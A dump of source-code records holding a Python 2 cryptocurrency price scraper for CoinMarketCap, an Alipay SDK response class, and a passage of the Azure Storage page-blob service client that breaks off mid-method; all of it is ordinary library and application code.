"BSD-2-Clause-FreeBSD"
] | null | null | null |
ces/coin_database.py
|
coincell-pub/CLI-crypto-console
|
30c2d2c64e14d0cfa54aafd0cabb7d1524cd5d56
|
[
"BSD-2-Clause",
"BSD-2-Clause-FreeBSD"
] | null | null | null |
# Copyright (c) 2021, coincell
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import requests
import threading
import json
import re
from exceptions import *
from utils import CoinPrice
class CoinMetadata:
def __init__(self, code, name, price, rank, volume_24h, market_cap, available_supply,
total_supply, max_supply, change_1h, change_24h, change_7d):
self.code = code
self.name = name
self.price = price
self.rank = rank
self.volume_24h = volume_24h
self.market_cap = market_cap
self.available_supply = available_supply
self.total_supply = total_supply
self.max_supply = max_supply
self.change_1h = change_1h
self.change_24h = change_24h
self.change_7d = change_7d
class CoinDatabase:
API_URL = 'https://api.coinmarketcap.com/v1/ticker/?convert={0}'
WEB_URL = 'https://coinmarketcap.com/all/views/all/'
VALID_FIAT_CURRENCIES = set([
'aud', 'brl', 'cad', 'chf', 'clp', 'cny', 'czk', 'dkk', 'eur', 'gbp', 'hkd', 'huf', 'idr',
'ils', 'inr', 'jpy', 'krw', 'mxn', 'myr', 'nok', 'nzd', 'php', 'pkr', 'pln', 'rub', 'sek',
'sgd', 'thb', 'try', 'twd', 'zar', 'usd'
])
def __init__(self, fiat_currency):
self.fiat_currency = fiat_currency.lower()
if self.fiat_currency not in CoinDatabase.VALID_FIAT_CURRENCIES:
raise ConfigException('Unknown fiat currency "{0}"'.format(fiat_currency))
self._running = True
self._metadata = {}
self._metadata_condition = threading.Condition()
self._stop_condition = threading.Condition()
self._api_url = CoinDatabase.API_URL.format(self.fiat_currency.upper())
self._web_url = CoinDatabase.WEB_URL
self._update_thread = threading.Thread(target=self.poll_data)
self._update_thread.start()
def stop(self):
self._running = False
with self._stop_condition:
self._stop_condition.notify()
self._update_thread.join()
def wait_for_data(self):
with self._metadata_condition:
if len(self._metadata) == 0:
self._metadata_condition.wait()
def get_currency_price(self, code):
if self.has_coin(code):
price = self.get_currency_metadata(code).price
return CoinPrice(code, price, self.fiat_currency)
else:
return CoinPrice(code)
def get_currency_metadata(self, code):
with self._metadata_condition:
if code in self._metadata:
return self._metadata[code]
else:
raise UnknownCurrencyException(code)
def has_coin(self, code):
with self._metadata_condition:
return code in self._metadata
def get_top_coins(self, top_limit):
coins = []
with self._metadata_condition:
for coin in self._metadata.values():
if coin.rank is not None and coin.rank <= top_limit:
coins.append(coin)
return sorted(coins, key=lambda i: i.rank)
def get_coins(self):
with self._metadata_condition:
return self._metadata.values()
def _extract_float(self, value):
return None if value is None else float(value)
def _merge_attribute(self, lhs, rhs, attribute):
if getattr(rhs, attribute) is not None:
setattr(lhs, attribute, getattr(rhs, attribute))
def _add_coin(self, code, coin):
if code in self._metadata:
stored_coin = self._metadata[code]
self._merge_attribute(stored_coin, coin, "name")
self._merge_attribute(stored_coin, coin, "price")
self._merge_attribute(stored_coin, coin, "rank")
self._merge_attribute(stored_coin, coin, "volume_24h")
self._merge_attribute(stored_coin, coin, "market_cap")
self._merge_attribute(stored_coin, coin, "available_supply")
self._merge_attribute(stored_coin, coin, "total_supply")
self._merge_attribute(stored_coin, coin, "max_supply")
self._merge_attribute(stored_coin, coin, "change_1h")
self._merge_attribute(stored_coin, coin, "change_24h")
self._merge_attribute(stored_coin, coin, "change_7d")
else:
self._metadata[code] = coin
def _load_from_api(self):
result = None
try:
raw_result = requests.get(self._api_url)
result = json.loads(raw_result.text)
except Exception as ex:
# TODO: somehow log this
pass
if result is not None:
with self._metadata_condition:
for entry in result:
try:
coin = CoinMetadata(
entry['symbol'],
entry['name'],
self._extract_float(entry['price_' + self.fiat_currency]),
int(entry['rank']),
self._extract_float(entry['24h_volume_' + self.fiat_currency]),
self._extract_float(entry['market_cap_' + self.fiat_currency]),
self._extract_float(entry['available_supply']),
self._extract_float(entry['total_supply']),
self._extract_float(entry['max_supply']),
self._extract_float(entry['percent_change_1h']),
self._extract_float(entry['percent_change_24h']),
self._extract_float(entry['percent_change_7d'])
)
self._add_coin(entry['symbol'], coin)
except Exception as ex:
if 'symbol' in entry:
print 'Failed to parse metadata for "{0}": {1}'.format(
entry['symbol'],
ex
)
else:
print 'Failed to parse currency metadata: {0}'.format(ex)
self._metadata_condition.notify_all()
def _load_from_web(self):
if self.fiat_currency == 'usd':
conversion_rate = 1.0
else:
data = requests.get(self._api_url).text
data = json.loads(data)
# Find the conversion rate between USD and whatever fiat currency we're using
for coin in data:
if coin['symbol'] == 'BTC':
conversion_rate = float(coin['price_' + self.fiat_currency]) / float(coin['price_usd'])
data = requests.get(self._web_url).text
table_start = data.find('id="currencies-all"')
table_end = data.find('</table>', table_start)
table = data[table_start:table_end]
attribute_keys = {
'class="text-center">' : 'rank',
'currency-name-container' : 'name',
'col-symbol' : 'code',
'market-cap' : 'market-cap',
'class="price"' : 'price',
'circulating-supply' : 'circulating-supply',
'class="volume"' : 'volume',
'data-timespan="1h"' : 'change-1h',
'data-timespan="24h"' : 'change-24h',
'data-timespan="7d"' : 'change-7d',
}
price_attributes = ['price', 'market-cap', 'volume']
number_attributes = price_attributes + ['circulating-supply']
percentage_attributes = ['change-1h', 'change-24h', 'change-7d']
with self._metadata_condition:
for entry in table.split('<tr ')[1:]:
attributes = {}
for column in entry.split('<td '):
for key, value in attribute_keys.items():
if key in column:
index = column.find(key)
match = re.findall('>([^<]+)<', column[index:], re.MULTILINE)
match = map(lambda i: i.strip(), match)
match = filter(lambda i: len(i) > 0, match)
if len(match) > 0:
attributes[value] = match[0].strip()
else:
attributes[value] = None
for key in number_attributes:
if attributes.get(key, None):
try:
attributes[key] = float(attributes[key].replace('$', '').replace(',', ''))
except:
attributes[key] = None
for key in price_attributes:
if attributes.get(key, None):
attributes[key] *= conversion_rate
for key in percentage_attributes:
if attributes.get(key, None):
attributes[key] = float(attributes[key].replace('%', ''))
try:
coin = CoinMetadata(
attributes['code'],
attributes['name'],
attributes['price'],
int(attributes['rank']),
attributes['volume'],
attributes['market-cap'],
attributes['circulating-supply'],
None,
None,
attributes.get('change-1h', None),
attributes.get('change-24h', None),
attributes.get('change-7d', None)
)
self._add_coin(attributes['code'], coin)
except Exception as ex:
pass
def poll_data(self):
while self._running:
# Load all coins by parsing coinmarketcap.com/all/views/all/
try:
self._load_from_web()
except:
pass
# Now get some better data for the coins that are served through the API
self._load_from_api()
with self._stop_condition:
# Sleep for 5 minutes
self._stop_condition.wait(60 * 5)
| 44.694656
| 107
| 0.563792
|
64d32016949b8988e7f3520c8fe40ba9ba078b48
| 1,041
|
py
|
Python
|
alipay/aop/api/response/AlipayUserCardActivateurlQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/response/AlipayUserCardActivateurlQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/response/AlipayUserCardActivateurlQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayUserCardActivateurlQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayUserCardActivateurlQueryResponse, self).__init__()
self._apply_card_url = None
self._callback = None
@property
def apply_card_url(self):
return self._apply_card_url
@apply_card_url.setter
def apply_card_url(self, value):
self._apply_card_url = value
@property
def callback(self):
return self._callback
@callback.setter
def callback(self, value):
self._callback = value
def parse_response_content(self, response_content):
response = super(AlipayUserCardActivateurlQueryResponse, self).parse_response_content(response_content)
if 'apply_card_url' in response:
self.apply_card_url = response['apply_card_url']
if 'callback' in response:
self.callback = response['callback']
| 28.916667
| 111
| 0.701249
|
30ec0d5c40fdf63edb0374a6e5345cb3b288ed38
| 82,060
|
py
|
Python
|
virtual_env/.cognitive_venv/Lib/site-packages/azure/storage/blob/pageblobservice.py
|
RajdeepBiswas/AI_Enabled_Image_Bucketization
|
d8cd23d49d5f6a93003e3a20a637fdb8f2032f19
|
[
"MIT"
] | 1
|
2021-10-16T19:33:56.000Z
|
2021-10-16T19:33:56.000Z
|
virtual_env/.cognitive_venv/Lib/site-packages/azure/storage/blob/pageblobservice.py
|
RajdeepBiswas/AI_Enabled_Image_Bucketization
|
d8cd23d49d5f6a93003e3a20a637fdb8f2032f19
|
[
"MIT"
] | null | null | null |
virtual_env/.cognitive_venv/Lib/site-packages/azure/storage/blob/pageblobservice.py
|
RajdeepBiswas/AI_Enabled_Image_Bucketization
|
d8cd23d49d5f6a93003e3a20a637fdb8f2032f19
|
[
"MIT"
] | 1
|
2019-07-25T15:09:05.000Z
|
2019-07-25T15:09:05.000Z
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import sys
from os import path
from azure.storage.common._common_conversion import (
_int_to_str,
_to_str,
_datetime_to_utc_string,
_get_content_md5,
)
from azure.storage.common._constants import (
SERVICE_HOST_BASE,
DEFAULT_PROTOCOL,
)
from azure.storage.common._error import (
_validate_not_none,
_validate_type_bytes,
_validate_encryption_required,
_validate_encryption_unsupported,
_ERROR_VALUE_NEGATIVE,
)
from azure.storage.common._http import HTTPRequest
from azure.storage.common._serialization import (
_get_data_bytes_only,
_add_metadata_headers,
)
from ._deserialization import (
_convert_xml_to_page_ranges,
_parse_page_properties,
_parse_base_properties,
)
from ._encryption import _generate_blob_encryption_data
from ._error import (
_ERROR_PAGE_BLOB_SIZE_ALIGNMENT,
)
from ._serialization import (
_get_path,
_validate_and_format_range_headers,
)
from ._upload_chunking import (
_PageBlobChunkUploader,
_upload_blob_chunks,
)
from .baseblobservice import BaseBlobService
from .models import (
_BlobTypes,
ResourceProperties)
if sys.version_info >= (3,):
from io import BytesIO
else:
from cStringIO import StringIO as BytesIO
# Keep this value sync with _ERROR_PAGE_BLOB_SIZE_ALIGNMENT
_PAGE_ALIGNMENT = 512
class PageBlobService(BaseBlobService):
'''
Page blobs are a collection of 512-byte pages optimized for random read and
write operations. To create a page blob, you initialize the page blob and
specify the maximum size the page blob will grow. To add or update the
contents of a page blob, you write a page or pages by specifying an offset
and a range that align to 512-byte page boundaries. A write to a page blob
can overwrite just one page, some pages, or up to 4 MB of the page blob.
Writes to page blobs happen in-place and are immediately committed to the
blob. The maximum size for a page blob is 8 TB.
:ivar int MAX_PAGE_SIZE:
The size of the pages put by create_blob_from_* methods. Smaller pages
may be put if there is less data provided. The maximum page size the service
supports is 4MB. When using the create_blob_from_* methods, empty pages are skipped.
'''
MAX_PAGE_SIZE = 4 * 1024 * 1024
def __init__(self, account_name=None, account_key=None, sas_token=None, is_emulated=False,
protocol=DEFAULT_PROTOCOL, endpoint_suffix=SERVICE_HOST_BASE, custom_domain=None,
request_session=None, connection_string=None, socket_timeout=None, token_credential=None):
'''
:param str account_name:
The storage account name. This is used to authenticate requests
signed with an account key and to construct the storage endpoint. It
is required unless a connection string is given, or if a custom
domain is used with anonymous authentication.
:param str account_key:
The storage account key. This is used for shared key authentication.
If neither account key or sas token is specified, anonymous access
will be used.
:param str sas_token:
A shared access signature token to use to authenticate requests
instead of the account key. If account key and sas token are both
specified, account key will be used to sign. If neither are
specified, anonymous access will be used.
:param bool is_emulated:
Whether to use the emulator. Defaults to False. If specified, will
override all other parameters besides connection string and request
session.
:param str protocol:
The protocol to use for requests. Defaults to https.
:param str endpoint_suffix:
The host base component of the url, minus the account name. Defaults
to Azure (core.windows.net). Override this to use the China cloud
(core.chinacloudapi.cn).
:param str custom_domain:
The custom domain to use. This can be set in the Azure Portal. For
example, 'www.mydomain.com'.
:param requests.Session request_session:
The session object to use for http requests.
:param str connection_string:
If specified, this will override all other parameters besides
request session. See
http://azure.microsoft.com/en-us/documentation/articles/storage-configure-connection-string/
for the connection string format.
:param int socket_timeout:
If specified, this will override the default socket timeout. The timeout specified is in seconds.
See DEFAULT_SOCKET_TIMEOUT in _constants.py for the default value.
:param token_credential:
A token credential used to authenticate HTTPS requests. The token value
should be updated before its expiration.
:type `~azure.storage.common.TokenCredential`
'''
self.blob_type = _BlobTypes.PageBlob
super(PageBlobService, self).__init__(
account_name, account_key, sas_token, is_emulated, protocol, endpoint_suffix,
custom_domain, request_session, connection_string, socket_timeout, token_credential)
def create_blob(
self, container_name, blob_name, content_length, content_settings=None,
sequence_number=None, metadata=None, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None, premium_page_blob_tier=None):
'''
Creates a new Page Blob.
See create_blob_from_* for high level functions that handle the
creation and upload of large blobs with automatic chunking and
progress notifications.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to create or update.
:param int content_length:
Required. This header specifies the maximum size
for the page blob, up to 1 TB. The page blob size must be aligned
to a 512-byte boundary.
:param ~azure.storage.blob.models.ContentSettings content_settings:
ContentSettings object used to set properties on the blob.
:param int sequence_number:
The sequence number is a user-controlled value that you can use to
track requests. The value of the sequence number must be between 0
and 2^63 - 1.The default value is 0.
:param metadata:
Name-value pairs associated with the blob as metadata.
:type metadata: dict(str, str)
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:param PremiumPageBlobTier premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:return: ETag and last modified properties for the new Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_encryption_unsupported(self.require_encryption, self.key_encryption_key)
return self._create_blob(
container_name,
blob_name,
content_length,
content_settings=content_settings,
sequence_number=sequence_number,
metadata=metadata,
lease_id=lease_id,
premium_page_blob_tier=premium_page_blob_tier,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout
)
def incremental_copy_blob(self, container_name, blob_name, copy_source,
metadata=None, destination_if_modified_since=None, destination_if_unmodified_since=None,
destination_if_match=None, destination_if_none_match=None, destination_lease_id=None,
source_lease_id=None, timeout=None):
'''
Copies an incremental copy of a blob asynchronously. This operation returns a copy operation
properties object, including a copy ID you can use to check or abort the
copy operation. The Blob service copies blobs on a best-effort basis.
The source blob for an incremental copy operation must be a page blob.
Call get_blob_properties on the destination blob to check the status of the copy operation.
The final blob will be committed when the copy completes.
:param str container_name:
Name of the destination container. The container must exist.
:param str blob_name:
Name of the destination blob. If the destination blob exists, it will
be overwritten. Otherwise, it will be created.
:param str copy_source:
A URL of up to 2 KB in length that specifies an Azure page blob.
The value should be URL-encoded as it would appear in a request URI.
The copy source must be a snapshot and include a valid SAS token or be public.
Example:
https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=<DateTime>&sastoken
:param metadata:
Name-value pairs associated with the blob as metadata. If no name-value
pairs are specified, the operation will copy the metadata from the
source blob or file to the destination blob. If one or more name-value
pairs are specified, the destination blob is created with the specified
metadata, and metadata is not copied from the source blob or file.
:type metadata: dict(str, str).
:param datetime destination_if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only
if the destination blob has been modified since the specified date/time.
If the destination blob has not been modified, the Blob service returns
status code 412 (Precondition Failed).
:param datetime destination_if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only if the destination blob
has not been modified since the specified ate/time. If the destination blob
has been modified, the Blob service returns status code 412 (Precondition Failed).
:param ETag destination_if_match:
An ETag value, or the wildcard character (*). Specify an ETag value for
this conditional header to copy the blob only if the specified ETag value
matches the ETag value for an existing destination blob. If the ETag for
the destination blob does not match the ETag specified for If-Match, the
Blob service returns status code 412 (Precondition Failed).
:param ETag destination_if_none_match:
An ETag value, or the wildcard character (*). Specify an ETag value for
this conditional header to copy the blob only if the specified ETag value
does not match the ETag value for the destination blob. Specify the wildcard
character (*) to perform the operation only if the destination blob does not
exist. If the specified condition isn't met, the Blob service returns status
code 412 (Precondition Failed).
:param str destination_lease_id:
The lease ID specified for this header must match the lease ID of the
destination blob. If the request does not include the lease ID or it is not
valid, the operation fails with status code 412 (Precondition Failed).
:param str source_lease_id:
Specify this to perform the Copy Blob operation only if
the lease ID given matches the active lease ID of the source blob.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: Copy operation properties such as status, source, and ID.
:rtype: :class:`~azure.storage.blob.models.CopyProperties`
'''
return self._copy_blob(container_name, blob_name, copy_source,
metadata,
source_if_modified_since=None, source_if_unmodified_since=None,
source_if_match=None, source_if_none_match=None,
destination_if_modified_since=destination_if_modified_since,
destination_if_unmodified_since=destination_if_unmodified_since,
destination_if_match=destination_if_match,
destination_if_none_match=destination_if_none_match,
destination_lease_id=destination_lease_id,
source_lease_id=source_lease_id, timeout=timeout,
incremental_copy=True)
def update_page(
self, container_name, blob_name, page, start_range, end_range,
validate_content=False, lease_id=None, if_sequence_number_lte=None,
if_sequence_number_lt=None, if_sequence_number_eq=None,
if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
Updates a range of pages.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param bytes page:
Content of the page.
:param int start_range:
Start of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param int end_range:
End of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param bool validate_content:
If true, calculates an MD5 hash of the page content. The storage
service checks the hash of the content that has arrived
with the hash that was sent. This is primarily valuable for detecting
bitflips on the wire if using http instead of https as https (the default)
will already validate. Note that this MD5 hash is not stored with the
blob.
:param str lease_id:
Required if the blob has an active lease.
:param int if_sequence_number_lte:
If the blob's sequence number is less than or equal to
the specified value, the request proceeds; otherwise it fails.
:param int if_sequence_number_lt:
If the blob's sequence number is less than the specified
value, the request proceeds; otherwise it fails.
:param int if_sequence_number_eq:
If the blob's sequence number is equal to the specified
value, the request proceeds; otherwise it fails.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify an ETag value for this conditional
header to write the page only if the blob's ETag value matches the
value specified. If the values do not match, the Blob service fails.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify an ETag value for this conditional
header to write the page only if the blob's ETag value does not
match the value specified. If the values are identical, the Blob
service fails.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: ETag and last modified properties for the updated Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_encryption_unsupported(self.require_encryption, self.key_encryption_key)
return self._update_page(
container_name,
blob_name,
page,
start_range,
end_range,
validate_content=validate_content,
lease_id=lease_id,
if_sequence_number_lte=if_sequence_number_lte,
if_sequence_number_lt=if_sequence_number_lt,
if_sequence_number_eq=if_sequence_number_eq,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout
)
def update_page_from_url(self, container_name, blob_name, start_range, end_range, copy_source_url,
source_range_start, source_content_md5=None, source_if_modified_since=None,
source_if_unmodified_since=None, source_if_match=None, source_if_none_match=None,
lease_id=None, if_sequence_number_lte=None, if_sequence_number_lt=None,
if_sequence_number_eq=None, if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
"""
Updates a range of pages to a page blob where the contents are read from a URL.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob.
:param int start_range:
Start of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param int end_range:
End of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param str copy_source_url:
The URL of the source data. It can point to any Azure Blob or File, that is either public or has a
shared access signature attached.
:param int source_range_start:
This indicates the start of the range of bytes(inclusive) that has to be taken from the copy source.
The service will read the same number of bytes as the destination range (end_range-start_range).
:param str source_content_md5:
If given, the service will calculate the MD5 hash of the block content and compare against this value.
:param datetime source_if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the source resource has been modified since the specified time.
:param datetime source_if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the source resource has not been modified since the specified date/time.
:param str source_if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the source resource's ETag matches the value specified.
:param str source_if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the source resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the source resource does not exist, and fail the
operation if it does exist.
:param str lease_id:
Required if the blob has an active lease.
:param int if_sequence_number_lte:
If the blob's sequence number is less than or equal to
the specified value, the request proceeds; otherwise it fails.
:param int if_sequence_number_lt:
If the blob's sequence number is less than the specified
value, the request proceeds; otherwise it fails.
:param int if_sequence_number_eq:
If the blob's sequence number is equal to the specified
value, the request proceeds; otherwise it fails.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
"""
_validate_encryption_unsupported(self.require_encryption, self.key_encryption_key)
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('copy_source_url', copy_source_url)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'page',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-page-write': 'update',
'x-ms-copy-source': copy_source_url,
'x-ms-source-content-md5': source_content_md5,
'x-ms-source-if-Modified-Since': _datetime_to_utc_string(source_if_modified_since),
'x-ms-source-if-Unmodified-Since': _datetime_to_utc_string(source_if_unmodified_since),
'x-ms-source-if-Match': _to_str(source_if_match),
'x-ms-source-if-None-Match': _to_str(source_if_none_match),
'x-ms-lease-id': _to_str(lease_id),
'x-ms-if-sequence-number-le': _to_str(if_sequence_number_lte),
'x-ms-if-sequence-number-lt': _to_str(if_sequence_number_lt),
'x-ms-if-sequence-number-eq': _to_str(if_sequence_number_eq),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match)
}
_validate_and_format_range_headers(
request,
start_range,
end_range,
align_to_page=True)
_validate_and_format_range_headers(
request,
source_range_start,
source_range_start+(end_range-start_range),
range_header_name="x-ms-source-range")
return self._perform_request(request, _parse_page_properties)
def clear_page(
self, container_name, blob_name, start_range, end_range,
lease_id=None, if_sequence_number_lte=None,
if_sequence_number_lt=None, if_sequence_number_eq=None,
if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
Clears a range of pages.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param int start_range:
Start of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param int end_range:
End of byte range to use for writing to a section of the blob.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-1023, etc.
:param str lease_id:
Required if the blob has an active lease.
:param int if_sequence_number_lte:
If the blob's sequence number is less than or equal to
the specified value, the request proceeds; otherwise it fails.
:param int if_sequence_number_lt:
If the blob's sequence number is less than the specified
value, the request proceeds; otherwise it fails.
:param int if_sequence_number_eq:
If the blob's sequence number is equal to the specified
value, the request proceeds; otherwise it fails.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify an ETag value for this conditional
header to write the page only if the blob's ETag value matches the
value specified. If the values do not match, the Blob service fails.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify an ETag value for this conditional
header to write the page only if the blob's ETag value does not
match the value specified. If the values are identical, the Blob
service fails.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: ETag and last modified properties for the updated Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'page',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-page-write': 'clear',
'x-ms-lease-id': _to_str(lease_id),
'x-ms-if-sequence-number-le': _to_str(if_sequence_number_lte),
'x-ms-if-sequence-number-lt': _to_str(if_sequence_number_lt),
'x-ms-if-sequence-number-eq': _to_str(if_sequence_number_eq),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
